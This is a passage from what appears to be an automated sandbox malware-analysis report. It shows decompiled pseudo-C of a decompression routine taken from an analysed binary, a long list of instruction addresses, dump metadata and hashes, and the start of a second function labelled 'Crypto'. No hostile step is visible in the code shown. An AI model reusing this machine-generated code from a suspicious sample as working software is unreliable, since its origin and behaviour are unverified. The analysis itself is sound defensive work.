										_t516 = _t444;
										goto L43;
									} else {
										L36:
										_t613 = 0x10;
										_t666 = _t656 >> _t613 - _t443;
										 *(_t697 + 0x20) = _t666;
										_t668 = ( *(_t666 + _t684 + 0x1014) & 0x000000ff) + _t504;
										_t480 = (_t668 >> 3) +  *(_t697 + 0x10);
										_t669 = _t668 & 0x00000007;
										 *(_t697 + 0x14) = _t480;
										 *_t689 = _t480;
										_t689[1] = _t669;
										 *(_t697 + 0x10) = _t669;
										_t449 =  *(_t684 + 0x1414 +  *(_t697 + 0x20) * 2) & 0x0000ffff;
										L44:
										_t450 = _t449 & 0x0000ffff;
										__eflags = _t450 - 4;
										if(_t450 >= 4) {
											L46:
											_t696 = (_t450 >> 1) - 1;
											_t454 = ((_t450 & 0x00000001 | 0x00000002) << _t696) + 1;
											 *(_t697 + 0x20) = _t454;
											_t504 = _t454;
											 *(_t697 + 0x18) = _t504;
											__eflags = _t696;
											if(_t696 == 0) {
												L63:
												_t689 = _t684 + 4;
												L64:
												__eflags = _t504 - 0x100;
												if(_t504 > 0x100) {
													_t678 = _t678 + 1;
													__eflags = _t504 - 0x2000;
													if(_t504 > 0x2000) {
														_t678 = _t678 + 1;
														__eflags = _t504 - 0x40000;
														if(_t504 > 0x40000) {
															_t678 = _t678 + 1;
															__eflags = _t678;
														}
													}
												}
												 *(_t684 + 0x6c) =  *(_t684 + 0x68);
												 *(_t684 + 0x68) =  *(_t684 + 0x64);
												 *(_t684 + 0x64) =  *(_t684 + 0x60);
												 *(_t684 + 0x60) = _t504;
												__eflags =  *((char*)(_t684 + 0x4c44));
												 *(_t684 + 0x74) = _t678;
												if( *((char*)(_t684 + 0x4c44)) == 0) {
													L71:
													_t646 =  *(_t684 + 0x7c);
													_t551 = _t646 - _t504;
													_t385 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
													 *(_t697 + 0x20) = _t551;
													__eflags = _t551 - _t385;
													if(_t551 >= _t385) {
														goto L90;
													}
													L72:
													__eflags = _t646 - _t385;
													if(_t646 >= _t385) {
														goto L90;
													}
													L73:
													_t389 =  *((intOrPtr*)(_t684 + 0x4b40));
													_t515 = _t389 + _t551;
													_t693 = _t646 + _t389;
													_t649 = 8;
													_t525 = _t684 + 0x7c;
													 *_t525 = _t646 + _t678;
													__eflags = _t678 - _t649;
													if(_t678 < _t649) {
														L81:
														__eflags = _t678;
														if(_t678 != 0) {
															 *_t693 =  *_t515;
															__eflags = _t678 - 1;
															if(_t678 > 1) {
																 *((char*)(_t693 + 1)) =  *((intOrPtr*)(_t515 + 1));
																__eflags = _t678 - 2;
																if(_t678 > 2) {
																	 *((char*)(_t693 + 2)) =  *((intOrPtr*)(_t515 + 2));
																	__eflags = _t678 - 3;
																	if(_t678 > 3) {
																		 *((char*)(_t693 + 3)) =  *((intOrPtr*)(_t515 + 3));
																		__eflags = _t678 - 4;
																		if(_t678 > 4) {
																			 *((char*)(_t693 + 4)) =  *((intOrPtr*)(_t515 + 4));
																			__eflags = _t678 - 5;
																			if(_t678 > 5) {
																				 *((char*)(_t693 + 5)) =  *((intOrPtr*)(_t515 + 5));
																				__eflags = _t678 - 6;
																				if(_t678 > 6) {
																					 *((char*)(_t693 + 6)) =  *((intOrPtr*)(_t515 + 6));
																				}
																			}
																		}
																	}
																}
															}
														}
														goto L89;
													}
													L74:
													__eflags =  *(_t697 + 0x18) - _t678;
													if( *(_t697 + 0x18) >= _t678) {
														L78:
														_t399 = _t678 >> 3;
														__eflags = _t399;
														 *(_t697 + 0x20) = _t399;
														_t687 = _t399;
														do {
															L79:
															E003F0320(_t693, _t515, _t649);
															_t697 = _t697 + 0xc;
															_t649 = 8;
															_t515 = _t515 + _t649;
															_t693 = _t693 + _t649;
															_t678 = _t678 - _t649;
															_t687 = _t687 - 1;
															__eflags = _t687;
														} while (_t687 != 0);
														_t684 =  *((intOrPtr*)(_t697 + 0x1c));
														_t525 =  *(_t697 + 0x24);
														goto L81;
													}
													L75:
													_t554 = _t678 >> 3;
													__eflags = _t554;
													do {
														L76:
														_t678 = _t678 - _t649;
														 *_t693 =  *_t515;
														 *((char*)(_t693 + 1)) =  *((intOrPtr*)(_t515 + 1));
														 *((char*)(_t693 + 2)) =  *((intOrPtr*)(_t515 + 2));
														 *((char*)(_t693 + 3)) =  *((intOrPtr*)(_t515 + 3));
														 *((char*)(_t693 + 4)) =  *((intOrPtr*)(_t515 + 4));
														 *((char*)(_t693 + 5)) =  *((intOrPtr*)(_t515 + 5));
														 *((char*)(_t693 + 6)) =  *((intOrPtr*)(_t515 + 6));
														_t408 =  *((intOrPtr*)(_t515 + 7));
														_t515 = _t515 + _t649;
														 *((char*)(_t693 + 7)) = _t408;
														_t693 = _t693 + _t649;
														_t554 = _t554 - 1;
														__eflags = _t554;
													} while (_t554 != 0);
													_t525 = _t684 + 0x7c;
													goto L81;
												} else {
													L69:
													_push( *(_t684 + 0xe6dc));
													_push(_t684 + 0x7c);
													_push(_t504);
													goto L70;
												}
											}
											L47:
											__eflags = _t696 - 4;
											if(__eflags < 0) {
												L62:
												_t459 = E003E8934(_t684 + 4);
												_t583 = 0x20;
												_t504 = (_t459 >> _t583 - _t696) +  *(_t697 + 0x20);
												_t586 =  *(_t697 + 0x10) + _t696;
												 *(_t697 + 0x18) = _t504;
												_t689 = _t684 + 4;
												 *_t689 = (_t586 >> 3) +  *(_t697 + 0x14);
												_t689[1] = _t586 & 0x00000007;
												goto L64;
											}
											L48:
											if(__eflags <= 0) {
												_t689 = _t684 + 4;
											} else {
												_t475 = E003E8934(_t684 + 4);
												_t605 = 0x24;
												_t504 = (_t475 >> _t605 - _t696 << 4) +  *(_t697 + 0x20);
												_t609 =  *(_t697 + 0x10) + 0xfffffffc + _t696;
												_t689 = _t684 + 4;
												_t665 =  *(_t697 + 0x14) + (_t609 >> 3);
												_t610 = _t609 & 0x00000007;
												 *(_t697 + 0x14) = _t665;
												 *_t689 = _t665;
												 *(_t697 + 0x10) = _t610;
												_t689[1] = _t610;
											}
											_t463 = E003DA89D(_t689);
											_t464 =  *(_t684 + 0x1efc);
											_t660 = _t463 & 0x0000fffe;
											__eflags = _t660 -  *((intOrPtr*)(_t684 + 0x1e7c + _t464 * 4));
											if(_t660 >=  *((intOrPtr*)(_t684 + 0x1e7c + _t464 * 4))) {
												L53:
												_t589 = 0xf;
												_t465 = _t464 + 1;
												 *(_t697 + 0x18) = _t589;
												__eflags = _t465 - _t589;
												if(_t465 >= _t589) {
													L59:
													_t591 = _t689[1] +  *(_t697 + 0x18);
													 *_t689 =  *_t689 + (_t591 >> 3);
													_t468 =  *(_t697 + 0x18);
													_t689[1] = _t591 & 0x00000007;
													_t593 = 0x10;
													_t596 =  *((intOrPtr*)(_t684 + 0x1ebc + _t468 * 4)) + (_t660 -  *((intOrPtr*)(_t684 + 0x1e78 + _t468 * 4)) >> _t593 - _t468);
													__eflags = _t596 -  *((intOrPtr*)(_t684 + 0x1e78));
													asm("sbb eax, eax");
													_t469 = _t468 & _t596;
													__eflags = _t469;
													_t470 =  *(_t684 + 0x2b00 + _t469 * 2) & 0x0000ffff;
													goto L60;
												}
												L54:
												_t598 = _t684 + (_t465 + 0x79f) * 4;
												while(1) {
													L55:
													__eflags = _t660 -  *_t598;
													if(_t660 <  *_t598) {
														break;
													}
													L56:
													_t465 = _t465 + 1;
													_t598 = _t598 + 4;
													__eflags = _t465 - 0xf;
													if(_t465 < 0xf) {
														continue;
													}
													L57:
													goto L59;
												}
												L58:
												 *(_t697 + 0x18) = _t465;
												goto L59;
											} else {
												L52:
												_t599 = 0x10;
												_t663 = _t660 >> _t599 - _t464;
												_t602 = ( *(_t663 + _t684 + 0x1f00) & 0x000000ff) +  *(_t697 + 0x10);
												 *_t689 = (_t602 >> 3) +  *(_t697 + 0x14);
												_t689[1] = _t602 & 0x00000007;
												_t470 =  *(_t684 + 0x2300 + _t663 * 2) & 0x0000ffff;
												L60:
												_t504 = _t504 + (_t470 & 0x0000ffff);
												__eflags = _t504;
												L61:
												 *(_t697 + 0x18) = _t504;
												goto L64;
											}
										}
										L45:
										_t504 = _t450 + 1;
										goto L61;
									}
								}
								L27:
								__eflags =  *((char*)(_t684 + 0x4c44));
								if( *((char*)(_t684 + 0x4c44)) == 0) {
									 *( *((intOrPtr*)(_t684 + 0x4b40)) +  *(_t684 + 0x7c)) = _t636;
									_t525 = _t684 + 0x7c;
									 *_t525 =  *_t525 + 1;
									continue;
								} else {
									 *(_t684 + 0x7c) =  *(_t684 + 0x7c) + 1;
									 *((char*)(E003E2391(_t684 + 0x4b44,  *(_t684 + 0x7c)))) = _t672 & 0x0000ffff;
									goto L0;
								}
							}
						}
						L12:
						__eflags = _t526 -  *(_t684 + 0x7c);
						if(_t526 ==  *(_t684 + 0x7c)) {
							goto L17;
						}
						L13:
						E003E5202(_t684);
						_t360 =  *(_t684 + 0x4c5c);
						__eflags = _t360 -  *((intOrPtr*)(_t684 + 0x4c4c));
						if(__eflags > 0) {
							goto L98;
						}
						L14:
						if(__eflags < 0) {
							L16:
							__eflags =  *((char*)(_t684 + 0x4c50));
							if( *((char*)(_t684 + 0x4c50)) != 0) {
								L156:
								 *((char*)(_t684 + 0x4c60)) = 0;
								goto L98;
							}
							goto L17;
						}
						L15:
						_t360 =  *(_t684 + 0x4c58);
						__eflags = _t360 -  *((intOrPtr*)(_t684 + 0x4c48));
						if(_t360 >  *((intOrPtr*)(_t684 + 0x4c48))) {
							goto L98;
						}
						goto L16;
					}
				}
			}

















































































































































                0x003e62ca
                0x003e62ca
                0x003e62ca
                0x003e62ca
                0x003e62ca
                0x003e62cd
                0x003e62cd
                0x003e62d3
                0x003e62de
                0x00000000
                0x003e62e0
                0x003e62e0
                0x00000000
                0x003e62e0
                0x003e62e6
                0x003e62e6
                0x003e62ef
                0x003e62f2
                0x00000000
                0x00000000
                0x003e6301
                0x003e6308
                0x003e690f
                0x003e6911
                0x003e6916
                0x003e691d
                0x003e691d
                0x003e630e
                0x003e630e
                0x003e630f
                0x003e6312
                0x003e6319
                0x00000000
                0x00000000
                0x003e631f
                0x003e6327
                0x003e6328
                0x003e6329
                0x003e632a
                0x003e6331
                0x00000000
                0x003e6333
                0x00000000
                0x003e6333
                0x003e6331
                0x003e6338
                0x003e633a
                0x003e633f
                0x003e6341
                0x00000000
                0x00000000
                0x003e6347
                0x003e6347
                0x003e6358
                0x003e635d
                0x003e639e
                0x003e63a0
                0x003e63a7
                0x003e63ad
                0x003e63b3
                0x003e63ba
                0x003e63ed
                0x003e63ef
                0x003e63f0
                0x003e63f1
                0x003e63f3
                0x003e640c
                0x003e640f
                0x003e6416
                0x003e6419
                0x003e641f
                0x003e6423
                0x003e642f
                0x003e643b
                0x003e643d
                0x003e6443
                0x003e6445
                0x003e6445
                0x003e6447
                0x003e644f
                0x00000000
                0x003e63f5
                0x003e63f8
                0x003e63fb
                0x003e63fb
                0x003e63fb
                0x003e63fd
                0x003e640a
                0x003e640a
                0x003e640a
                0x003e63ff
                0x003e63ff
                0x003e6400
                0x003e6403
                0x003e6406
                0x00000000
                0x003e6408
                0x00000000
                0x003e6408
                0x003e6406
                0x00000000
                0x003e63fb
                0x003e63bc
                0x003e63be
                0x003e63c1
                0x003e63cb
                0x003e63d3
                0x003e63d6
                0x003e63d9
                0x003e63dc
                0x003e63df
                0x003e63e7
                0x003e6453
                0x003e6453
                0x003e645b
                0x003e645d
                0x003e649d
                0x003e649d
                0x003e64a3
                0x003e68e6
                0x003e68e6
                0x003e68e8
                0x003e6920
                0x003e6920
                0x003e6926
                0x003e6aab
                0x003e6aab
                0x003e6aab
                0x003e6ab4
                0x003e6ab7
                0x003e6ab9
                0x003e6abd
                0x003e6acc
                0x003e6ace
                0x003e6ad1
                0x003e6ad8
                0x003e6ade
                0x003e6ae4
                0x003e6aeb
                0x003e6b1b
                0x003e6b1d
                0x003e6b1e
                0x003e6b1f
                0x003e6b21
                0x003e6b3d
                0x003e6b40
                0x003e6b44
                0x003e6b47
                0x003e6b4a
                0x003e6b4d
                0x003e6b57
                0x003e6b5d
                0x003e6b69
                0x003e6b6b
                0x003e6b71
                0x003e6b73
                0x003e6b73
                0x003e6b75
                0x003e6b7d
                0x003e6b7d
                0x003e6b80
                0x003e6b83
                0x003e6b95
                0x003e6b9a
                0x003e6b9d
                0x003e6b9f
                0x003e6ba3
                0x003e6baa
                0x003e6bb3
                0x003e6bb5
                0x003e6bbc
                0x003e6bbf
                0x003e6bbf
                0x003e6bc2
                0x003e6bc2
                0x003e6b85
                0x003e6b85
                0x003e6b85
                0x003e6bc5
                0x003e6bcc
                0x003e6bd0
                0x003e6bd3
                0x003e6be5
                0x003e6be5
                0x003e6bf0
                0x003e6bf2
                0x003e6bf7
                0x003e6bf9
                0x00000000
                0x00000000
                0x003e6bff
                0x003e6bff
                0x003e6c01
                0x00000000
                0x00000000
                0x003e6c07
                0x003e6c07
                0x003e6c0d
                0x003e6c11
                0x003e6c17
                0x003e6c18
                0x003e6c1b
                0x003e6c1d
                0x003e69fc
                0x003e69fc
                0x003e69ff
                0x003e6a01
                0x003e68a1
                0x003e68a1
                0x00000000
                0x003e68a1
                0x003e6a07
                0x003e6a09
                0x003e6a0c
                0x003e6a0f
                0x003e6a12
                0x00000000
                0x00000000
                0x003e6a18
                0x003e6a1b
                0x003e6a1e
                0x003e6a21
                0x003e6a24
                0x00000000
                0x00000000
                0x003e6a2a
                0x003e6a2d
                0x003e6a30
                0x003e6a33
                0x003e6a36
                0x00000000
                0x00000000
                0x003e6a3c
                0x003e6a3f
                0x003e6a42
                0x003e6a45
                0x003e6a48
                0x00000000
                0x00000000
                0x003e6a4e
                0x003e6a51
                0x003e6a54
                0x003e6a57
                0x003e6a5a
                0x00000000
                0x00000000
                0x003e6a60
                0x003e6a63
                0x003e6a66
                0x003e6a69
                0x003e6a6c
                0x00000000
                0x00000000
                0x003e6a72
                0x003e6a72
                0x003e6a75
                0x00000000
                0x003e6a75
                0x003e6c23
                0x003e6c23
                0x003e6c25
                0x003e6c6b
                0x003e6c6d
                0x003e6c6d
                0x003e6c70
                0x003e6c74
                0x003e6c76
                0x003e6c76
                0x003e6c79
                0x003e6c7e
                0x003e6c83
                0x003e6c84
                0x003e6c86
                0x003e6c88
                0x003e6c8a
                0x003e6c8a
                0x003e6c8a
                0x003e69f8
                0x003e69f8
                0x00000000
                0x003e69f8
                0x003e6c27
                0x003e6c29
                0x003e6c29
                0x003e6c2c
                0x003e6c2c
                0x003e6c2e
                0x003e6c30
                0x003e6c36
                0x003e6c3c
                0x003e6c42
                0x003e6c48
                0x003e6c4e
                0x003e6c54
                0x003e6c57
                0x003e6c5a
                0x003e6c5c
                0x003e6c5f
                0x003e6c61
                0x003e6c61
                0x003e6c61
                0x00000000
                0x003e6bd5
                0x003e6bd5
                0x003e6bd5
                0x003e6bde
                0x003e6bdf
                0x003e678e
                0x003e678e
                0x003e6795
                0x003e62ca
                0x003e62ca
                0x003e62ca
                0x003e62ca
                0x003e62cd
                0x003e62cd
                0x00000000
                0x003e6c94
                0x003e6c94
                0x003e6c97
                0x003e6c97
                0x003e6c9f
                0x003e6ca5
                0x003e6ca5
                0x003e6cab
                0x003e6cad
                0x003e6cb1
                0x003e6cb7
                0x003e6cbe
                0x003e6cc0
                0x003e6cc3
                0x003e6cc3
                0x003e6cc3
                0x003e6cc8
                0x003e6ccb
                0x003e62ca
                0x003e62ca
                0x003e62ca
                0x003e62ca
                0x003e62ca
                0x003e62cd
                0x003e62d3
                0x003e62de
                0x00000000
                0x003e62e0
                0x003e62e0
                0x00000000
                0x003e62e0
                0x003e62de
                0x003e68fb
                0x003e6902
                0x003e6907
                0x003e6907
                0x00000000
                0x003e68a9
                0x003e68a9
                0x003e68ac
                0x003e68ac
                0x003e68b4
                0x003e68ba
                0x003e68be
                0x003e68be
                0x003e68c4
                0x003e68c6
                0x003e68ca
                0x003e68d0
                0x003e68d7
                0x003e68d9
                0x003e68dc
                0x003e68dc
                0x003e68dc
                0x00000000
                0x003e68e1
                0x003e62ca
                0x003e6bd3
                0x003e6b23
                0x003e6b29
                0x003e6b2c
                0x003e6b2c
                0x003e6b2c
                0x003e6b2e
                0x00000000
                0x00000000
                0x003e6b30
                0x003e6b30
                0x003e6b31
                0x003e6b34
                0x003e6b37
                0x00000000
                0x00000000
                0x003e6b39
                0x00000000
                0x003e6b39
                0x003e6b3b
                0x003e6b3b
                0x00000000
                0x003e6b3b
                0x003e6aed
                0x003e6aef
                0x003e6af2
                0x003e6afc
                0x003e6b04
                0x003e6b07
                0x003e6b0a
                0x003e6b0d
                0x003e6b15
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003e6abf
                0x003e6abf
                0x003e6ac2
                0x003e6ac4
                0x003e6ac7
                0x003e6ac7
                0x003e6ac7
                0x00000000
                0x003e6abf
                0x003e692c
                0x003e692c
                0x003e692f
                0x003e6931
                0x003e62ca
                0x003e62ca
                0x003e62ca
                0x003e62ca
                0x00000000
                0x003e62ca
                0x003e62ca
                0x003e6937
                0x003e6937
                0x003e693e
                0x003e6952
                0x003e6952
                0x003e695d
                0x003e6960
                0x003e6965
                0x003e6967
                0x003e6969
                0x003e6a7d
                0x003e6a7d
                0x003e6a83
                0x003e6a83
                0x003e6a89
                0x003e6a8b
                0x003e6a8f
                0x003e6a95
                0x003e6a9c
                0x003e6a9e
                0x003e6aa1
                0x003e6aa1
                0x003e6aa1
                0x00000000
                0x003e6aa6
                0x003e696f
                0x003e696f
                0x003e6971
                0x00000000
                0x00000000
                0x003e6977
                0x003e6977
                0x003e697d
                0x003e6981
                0x003e6987
                0x003e6988
                0x003e698b
                0x003e698d
                0x00000000
                0x00000000
                0x003e698f
                0x003e698f
                0x003e6991
                0x003e69d4
                0x003e69d6
                0x003e69d6
                0x003e69d9
                0x003e69dd
                0x003e69df
                0x003e69df
                0x003e69e2
                0x003e69e7
                0x003e69ec
                0x003e69ed
                0x003e69ef
                0x003e69f1
                0x003e69f3
                0x003e69f3
                0x003e69f3
                0x00000000
                0x003e69df
                0x003e6993
                0x003e6995
                0x003e6995
                0x003e6998
                0x003e6998
                0x003e699a
                0x003e699c
                0x003e69a2
                0x003e69a8
                0x003e69ae
                0x003e69b4
                0x003e69ba
                0x003e69c0
                0x003e69c3
                0x003e69c6
                0x003e69c8
                0x003e69cb
                0x003e69cd
                0x003e69cd
                0x003e69cd
                0x00000000
                0x003e69d2
                0x003e6940
                0x003e6940
                0x003e6949
                0x003e694a
                0x00000000
                0x003e694a
                0x003e68ea
                0x003e68f0
                0x003e68f2
                0x003e68f7
                0x003e68f9
                0x00000000
                0x00000000
                0x00000000
                0x003e68f9
                0x003e64a9
                0x003e64a9
                0x003e64af
                0x003e64b2
                0x003e64c8
                0x003e64cb
                0x003e64d1
                0x003e64d4
                0x003e64d6
                0x003e64da
                0x003e64df
                0x003e64e5
                0x003e64f0
                0x003e64f7
                0x003e64f9
                0x003e64f9
                0x003e64fc
                0x003e6500
                0x003e6503
                0x003e6503
                0x003e64b4
                0x003e64b4
                0x003e64b8
                0x003e64b8
                0x003e6508
                0x003e650f
                0x003e6515
                0x003e651b
                0x003e6522
                0x003e6561
                0x003e6563
                0x003e6564
                0x003e6565
                0x003e6567
                0x003e6583
                0x003e6586
                0x003e658a
                0x003e658d
                0x003e6593
                0x003e659d
                0x003e65a0
                0x003e65a6
                0x003e65a9
                0x003e65b6
                0x003e65b8
                0x003e65be
                0x003e65c0
                0x003e65c0
                0x003e65c2
                0x00000000
                0x003e65c2
                0x003e6569
                0x003e656f
                0x003e6572
                0x003e6572
                0x003e6572
                0x003e6574
                0x00000000
                0x00000000
                0x003e6576
                0x003e6576
                0x003e6577
                0x003e657a
                0x003e657d
                0x00000000
                0x00000000
                0x003e657f
                0x00000000
                0x003e657f
                0x003e6581
                0x003e6581
                0x00000000
                0x003e6524
                0x003e6524
                0x003e6526
                0x003e6529
                0x003e652b
                0x003e6537
                0x003e653e
                0x003e6542
                0x003e6545
                0x003e6549
                0x003e6550
                0x003e6553
                0x003e6557
                0x003e65ca
                0x003e65ca
                0x003e65cd
                0x003e65d0
                0x003e65da
                0x003e65e4
                0x003e65e9
                0x003e65ea
                0x003e65ee
                0x003e65f0
                0x003e65f4
                0x003e65f6
                0x003e6744
                0x003e6744
                0x003e6747
                0x003e6747
                0x003e674d
                0x003e674f
                0x003e6750
                0x003e6756
                0x003e6758
                0x003e6759
                0x003e675f
                0x003e6761
                0x003e6761
                0x003e6761
                0x003e675f
                0x003e6756
                0x003e6765
                0x003e676b
                0x003e6771
                0x003e6774
                0x003e6777
                0x003e677e
                0x003e6781
                0x003e679f
                0x003e679f
                0x003e67aa
                0x003e67ac
                0x003e67b1
                0x003e67b5
                0x003e67b7
                0x00000000
                0x00000000
                0x003e67bd
                0x003e67bd
                0x003e67bf
                0x00000000
                0x00000000
                0x003e67c5
                0x003e67c5
                0x003e67cd
                0x003e67d0
                0x003e67d6
                0x003e67d7
                0x003e67da
                0x003e67dc
                0x003e67de
                0x003e6856
                0x003e6856
                0x003e6858
                0x003e685c
                0x003e685f
                0x003e6862
                0x003e6867
                0x003e686a
                0x003e686d
                0x003e6872
                0x003e6875
                0x003e6878
                0x003e687d
                0x003e6880
                0x003e6883
                0x003e6888
                0x003e688b
                0x003e688e
                0x003e6893
                0x003e6896
                0x003e6899
                0x003e689e
                0x003e689e
                0x003e6899
                0x003e688e
                0x003e6883
                0x003e6878
                0x003e686d
                0x003e6862
                0x00000000
                0x003e6858
                0x003e67e0
                0x003e67e0
                0x003e67e4
                0x003e682a
                0x003e682c
                0x003e682c
                0x003e682f
                0x003e6833
                0x003e6835
                0x003e6835
                0x003e6838
                0x003e683d
                0x003e6842
                0x003e6843
                0x003e6845
                0x003e6847
                0x003e6849
                0x003e6849
                0x003e6849
                0x003e684e
                0x003e6852
                0x00000000
                0x003e6852
                0x003e67e6
                0x003e67e8
                0x003e67e8
                0x003e67eb
                0x003e67eb
                0x003e67ed
                0x003e67ef
                0x003e67f5
                0x003e67fb
                0x003e6801
                0x003e6807
                0x003e680d
                0x003e6813
                0x003e6816
                0x003e6819
                0x003e681b
                0x003e681e
                0x003e6820
                0x003e6820
                0x003e6820
                0x003e6825
                0x00000000
                0x003e6783
                0x003e6783
                0x003e6783
                0x003e678c
                0x003e678d
                0x00000000
                0x003e678d
                0x003e6781
                0x003e65fc
                0x003e65fc
                0x003e65ff
                0x003e670e
                0x003e6711
                0x003e671a
                0x003e6723
                0x003e6727
                0x003e672b
                0x003e6732
                0x003e673c
                0x003e673f
                0x00000000
                0x003e673f
                0x003e6605
                0x003e6605
                0x003e6649
                0x003e6607
                0x003e660a
                0x003e6617
                0x003e6626
                0x003e662a
                0x003e662e
                0x003e6634
                0x003e6636
                0x003e6639
                0x003e663d
                0x003e6640
                0x003e6644
                0x003e6644
                0x003e664e
                0x003e6655
                0x003e665b
                0x003e6661
                0x003e6668
                0x003e6699
                0x003e669b
                0x003e669c
                0x003e669d
                0x003e66a1
                0x003e66a3
                0x003e66c1
                0x003e66c4
                0x003e66d0
                0x003e66d3
                0x003e66d7
                0x003e66dc
                0x003e66ef
                0x003e66f1
                0x003e66f7
                0x003e66f9
                0x003e66f9
                0x003e66fb
                0x00000000
                0x003e66fb
                0x003e66a5
                0x003e66ab
                0x003e66ae
                0x003e66ae
                0x003e66ae
                0x003e66b0
                0x00000000
                0x00000000
                0x003e66b2
                0x003e66b2
                0x003e66b3
                0x003e66b6
                0x003e66b9
                0x00000000
                0x00000000
                0x003e66bb
                0x00000000
                0x003e66bb
                0x003e66bd
                0x003e66bd
                0x00000000
                0x003e666a
                0x003e666a
                0x003e666c
                0x003e666f
                0x003e6679
                0x003e6689
                0x003e668c
                0x003e668f
                0x003e6703
                0x003e6706
                0x003e6706
                0x003e6708
                0x003e6708
                0x00000000
                0x003e6708
                0x003e6668
                0x003e65d2
                0x003e65d2
                0x00000000
                0x003e65d2
                0x003e6522
                0x003e645f
                0x003e645f
                0x003e6466
                0x003e6490
                0x003e6493
                0x003e6496
                0x00000000
                0x003e6468
                0x003e6475
                0x003e6480
                0x00000000
                0x003e6480
                0x003e6466
                0x003e63ba
                0x003e635f
                0x003e635f
                0x003e6362
                0x00000000
                0x00000000
                0x003e6364
                0x003e6366
                0x003e636b
                0x003e6371
                0x003e6377
                0x00000000
                0x00000000
                0x003e637d
                0x003e637d
                0x003e6391
                0x003e6391
                0x003e6398
                0x003e6cd0
                0x003e6cd0
                0x00000000
                0x003e6cd0
                0x00000000
                0x003e6398
                0x003e637f
                0x003e637f
                0x003e6385
                0x003e638b
                0x00000000
                0x00000000
                0x00000000
                0x003e638b
                0x003e62cd

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                • Instruction ID: 83c308b37a0b5685beec4634b1a05f73c08eecd738d1ffeadeaf45bf63eb55c5
                • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                • Instruction Fuzzy Hash: DF620B716047D48FCB16CF29C8916B9BBE1BFA5344F058A6DE8DA8B386D730E945CB10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E77EF Relevance: .8, Instructions: 817COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 98%
                			E003E77EF(signed int __ecx) {
				signed int _t363;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				void* _t385;
				signed int _t388;
				signed int _t389;
				intOrPtr _t391;
				signed int _t401;
				char _t410;
				unsigned int _t411;
				void* _t421;
				signed int _t422;
				signed int _t423;
				intOrPtr _t425;
				signed int _t428;
				char _t437;
				signed int _t439;
				signed int _t441;
				signed int _t444;
				signed int* _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t457;
				void* _t462;
				signed int _t463;
				signed int _t464;
				intOrPtr _t466;
				signed int _t469;
				char _t478;
				unsigned int _t479;
				signed int* _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t491;
				signed int _t492;
				signed short _t493;
				unsigned int _t499;
				signed int _t500;
				signed int* _t506;
				unsigned int _t507;
				intOrPtr _t520;
				intOrPtr* _t521;
				intOrPtr _t523;
				signed int* _t524;
				signed int _t525;
				intOrPtr _t526;
				signed int _t528;
				void* _t529;
				signed int _t532;
				signed int* _t534;
				unsigned int _t537;
				signed int _t538;
				void* _t539;
				signed int _t542;
				signed int _t544;
				signed int _t547;
				void* _t549;
				unsigned int _t552;
				signed int _t553;
				intOrPtr* _t555;
				void* _t556;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t564;
				signed int* _t569;
				void* _t570;
				signed int _t573;
				signed int _t575;
				signed int _t577;
				signed int _t580;
				void* _t582;
				unsigned int _t585;
				signed int _t586;
				signed int _t588;
				signed int _t590;
				void* _t592;
				signed int _t595;
				intOrPtr* _t597;
				void* _t598;
				signed int _t601;
				void* _t604;
				signed int _t607;
				signed int _t608;
				intOrPtr* _t610;
				void* _t611;
				signed int _t614;
				signed int _t615;
				void* _t617;
				signed int _t620;
				intOrPtr* _t623;
				void* _t624;
				signed int _t628;
				unsigned int _t630;
				signed int _t633;
				signed int _t634;
				signed int _t635;
				unsigned int _t637;
				signed int _t640;
				void* _t643;
				signed int* _t644;
				signed int _t645;
				signed int _t646;
				void* _t649;
				unsigned int _t651;
				signed int _t654;
				signed int _t658;
				void* _t661;
				signed int* _t662;
				unsigned int _t664;
				signed int _t667;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				intOrPtr* _t672;
				signed int _t673;
				signed int* _t674;
				signed int _t676;
				signed int _t677;
				unsigned int _t681;
				signed int _t682;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int* _t690;
				signed int* _t691;
				signed int* _t692;
				signed int _t694;
				unsigned int _t696;
				signed int _t697;
				signed int _t698;
				signed int* _t699;
				signed int _t702;
				signed int _t704;
				signed int _t705;
				signed int _t707;
				signed int _t709;
				char* _t710;
				signed int _t711;
				unsigned int _t713;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t723;
				signed int _t724;
				void* _t725;

				_t520 =  *((intOrPtr*)(_t725 + 0x40));
				_t686 = __ecx;
				_t692 = _t520 + 4;
				 *(_t725 + 0x24) = __ecx;
				_t672 = _t520 + 0x18;
				 *(_t725 + 0x10) = _t692;
				if( *((char*)(_t520 + 0x2c)) != 0) {
					 *(_t725 + 0x10) = _t692;
					L4:
					_t523 =  *_t672;
					if( *_t692 <=  *((intOrPtr*)(_t520 + 0x24)) + _t523) {
